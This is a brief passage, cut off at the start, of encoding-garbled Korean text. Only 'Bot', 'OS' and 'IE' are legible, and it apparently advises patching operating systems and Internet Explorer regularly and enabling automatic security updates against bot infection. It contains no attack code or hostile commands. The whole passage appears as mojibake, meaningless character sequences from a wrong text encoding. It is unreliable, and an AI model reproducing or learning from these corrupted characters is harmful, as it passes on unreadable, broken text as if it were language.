Bot¿¡ °¨¿°µÉ ¼ö ÀÖ´Ù. µû¶ó¼, OS ¹× IE¿¡ ´ëÇÑ º¸¾È ÆÐÄ¡¸¦ ÁÖ±âÀûÀ¸·Î Çϰí, °¡´ÉÇÑ ¡°ÀÚµ¿ º¸
¾È ¾÷µ¥ÀÌÆ®¡± ±â´ÉÀ» ¼³Á¤ÇØ ³õµµ·Ï ÇÏ¿©¾ß ÇÑ´Ù.